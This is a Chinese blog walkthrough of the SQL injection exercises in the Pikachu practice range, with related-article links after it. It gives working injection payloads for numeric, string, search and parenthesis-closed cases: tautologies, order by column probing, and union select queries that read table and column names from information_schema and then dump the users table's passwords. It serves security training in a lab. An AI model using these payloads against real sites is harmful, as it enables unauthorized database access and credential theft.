[Pikachu靶场实战系列] SQL注入

最新推荐文章于 2024-06-30 22:45:53 发布
最新推荐文章于 2024-06-30 22:45:53 发布
阅读量442 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45813980/article/details/119085517
版权

目录

SQL注入概述

在这里插入图片描述

数字型注入(post)

在这里插入图片描述
随便选择一个进行抓包
在这里插入图片描述
可以看出,传入的值赋值给了参数id.
因为是数字型注入,我们在1后面加上一个单引号看是否报错
在这里插入图片描述
报错了,确定漏洞存在

id=1 or 1 #

可以把所有列表爆出来,因为1为真,符合所有条件,所以输出了所有的用户
在这里插入图片描述
order by 判断字段长度
在这里插入图片描述
在这里插入图片描述
order by 2 正常,order by 3 报错,说明字段长度为2
然后union select 进行联合查询,右边的1和2就是回显查询结果的地方
在这里插入图片描述
先查一下数据库,将结果回显到2的地方(要将id改为一个不存在的数字,一般用-1):

id=-1 union select 1,database() #

数据库名为pikachu
在这里插入图片描述

接下来就是构造sql语句,查询自己想要的内容
查数据库的表

id=-1 union select 1,table_name from information_schema.tables where table_schema=‘pikachu’ #

在这里插入图片描述

查询指定表的列名,这里我查询的是users表

id=-1 union select 1,column_name from information_schema.columns where table_schema=‘pikachu’ and table_name=‘users’ #

在这里插入图片描述

查询指定列的数据,我这里查询password

id=-1 union select 1,password from users#

在这里插入图片描述

字符型注入(get)

先随便输入一个值,点击查询,在url中看到
在这里插入图片描述
然后单引号报错
在这里插入图片描述
剩下的步骤和post一样,只是将pyload放到url中。
order by 判断字段长度为2

1’ order by 3 #

在这里插入图片描述
爆数据库

-1’ union select 1,database() #

在这里插入图片描述
其他步骤参考get形式即可

搜索型注入

先输入个1’尝试报错
在这里插入图片描述
在这里插入图片描述
根据报错信息可知,闭合可能要用%
输入1%,没有报错,但是因为用户名里没有1,所以没有搜索到
在这里插入图片描述
只输入一个%,输出了所有用户
在这里插入图片描述
order by 判断字段长度,长度为3

1 %’ order by 4 #

在这里插入图片描述
查询数据库

1 %’ union select 1,2,database() #

在这里插入图片描述
其他步骤仍然参考数字型注入

xx型注入

在这里插入图片描述
提示里面说的好
在这里插入图片描述
直接1’尝试报错
在这里插入图片描述
根据报错信息,我们构造闭合
1’) # 没有报错,成功闭合
在这里插入图片描述

order by 查字段长度

1’) order by 3#
在这里插入图片描述
联合查询查数据库
1’) union select 1,database()#

在这里插入图片描述
其他步骤参考字符型注入

00勇士王子
关注
专栏目录
SQL注入-Pikachu靶场通关_pikachu靶场通关sql(1),网络安全应用开发基础大纲
m0_61369275的博客
04-06 825
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
Pikachu靶场 报错SQL注入实战测试
感谢关注
12-24 727
使用。
pikachu靶场SQL注入.docx
09-13
pikachu靶场SQL注入章节解题
Pikachu靶场--Sql Inject
最新发布
qq_65150735的博客
06-30 1082
Pikachu靶场--Sql Inject(SQL注入)
pikachu靶场SQL注入
2303_79340715的博客
03-17 2195
个人觉得SQL注入还是挺难的,关键点在于找SQL语句的闭合,文章会比较长,要是能一关一关对着看的话,会对你有不少好处滴!!!当然啦,手搓重要,学会用sqlmap也是挺重要的哦,主要是我还不会~爆账号密码之类的信息再插一句:设置靶场的人已经告诉我们数据库是mysql了。
pikachu靶场 SQL-inject
Al_1的博客
10-03 941
数字型注入,字符型注入,搜索型注入,xx型注入,增改注入,删除注入,请求头注入,布尔盲注,时间盲注,宽字节盲注
pikachu靶场,可用于web渗透练习
05-19
1. **基础漏洞**:Pikachu靶场涵盖了常见的Web漏洞,如SQL注入、XSS跨站脚本、文件包含、命令注入等。通过这些挑战,用户可以学习到如何识别和利用这些漏洞。 2. **认证与授权**:靶场可能包含对用户认证和权限...
pikachu靶场环境
02-12
在"Pikachu靶场",用户通常会遇到各种网络安全挑战,包括但不限于Web应用漏洞挖掘(如SQL注入、XSS跨站脚本攻击、文件包含漏洞等)、网络服务漏洞利用(如FTP、SMTP、SSH等服务的漏洞)、密码学概念应用(如加密与...
pikachu靶场搭建
02-27
pikachu靶场,你会遇到各种Web安全漏洞,例如SQL注入、命令注入、跨站脚本(XSS)、跨站请求伪造(CSRF)、文件包含漏洞、权限绕过等。通过实践,你可以学习到如何利用这些漏洞,同时也能理解如何预防它们。例如...
Pikachu(皮卡丘)靶场SQL注入
剁椒鱼头没剁椒的博客
12-14 5137
1)宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个 字符是一个汉字(前一个 ascii 码要大于 128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql 会调用转义函数,将单引号变为’,其\的十 六进制是%5c,mysql 的 GBK 编码,会认为%df%5c 是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。输入kobe’ and 1=1#的时候页面正常,并且kobe’ and 1=2#页面不正常,证使用单引号闭合。
SQL注入——————pikachu靶场
qq_61579604的博客
10-16 241
修改后。
SQL注入-pikachu靶场
qq_43936524的博客
10-13 386
文章目录SQL注入概述SQL分类 SQL注入概述 SQL注入指的是通过将恶意SQL语句添加到应用的输入参数,传递到后台被SQL服务器解析后执行的攻击。 SQL分类 数字型注入 输入查询id后抓包 改变参数1 = 1 or 1 字符型注入 ...
sql注入——pikachu靶场
cjh12340826的博客
07-20 658
(1)先用burpsuit抓包,或使用浏览器开发者工具找到请求data。10,时间盲注,原理:如果可以注入,就延时,如果不行就立刻显示。6,detele注入使用hackbar(报错显示数据库)12,------- 基于报错信息获取---------然后使用hackbar点击post data发送请求。注册用户时注入,使用重发器(基于报错信息获取)7,http header和cookie注入。工具:burpsuit,hackbar。5,insert,update注入。在修改信息页面:提交修改,
pikachu靶场--SQL inject--数字型(post)/字符型(get)/搜索型/xx型注入【4.1】~【4.4】
lmei1228的博客
06-10 813
当我们输入字符的时候,正常情况下,后台会给输入的字符+单引号,把他作为一个整个的字符串来处理,所以我们如果输入的是kobe or 1 = 1,传到后台的时候,or 1 = 1就不会起作用了,因此我们要构造闭合,输入kobe’ or 1 = 1#(#用--替换也可以,都是有着注释的意思,把后面的单引号注释掉),可以看到,它也能实现遍历。首先,打开我们的mysql数据库,use pikachu,然后对表“member”做查询,可以看到当参数为“1”和“1 or 1=1”时,所查询到的结果时大不相同的。
Pikachu靶场sql注入通关
oiadkt的博客
03-07 5162
pickchusql注入通关
SQL注入-Pikachu靶场通关
rumil的博客
08-21 2677
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
pikachu靶场--SQL inject--insert/update/delete/HTTP header注入/盲注【4.5】~【4.9】
lmei1228的博客
06-11 851
substr(database(),1,1)意思是把database()的结果取值,取从第1个字符开始的第1个字符,再包裹一层ascii(),意思是将取出的字符转换成ASCII码输出,这里我们的数据库名称为apache,所以结果依次为:a ,97。因此,我们可以构造闭合xxx' or updatexml(1,concat(0x7e,database()),0) or' ,这样,返回的报错内容里就有我们所需要的信息。但还有一个条件,就是“时间”,通过特定的输入,判断后台执行的是时间,从而确定注入。
pikachu靶场通关sql注入
08-10
- *2* *3* [pikachu靶场通关之sql注入系列](https://blog.csdn.net/qq_51902218/article/details/120333234)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值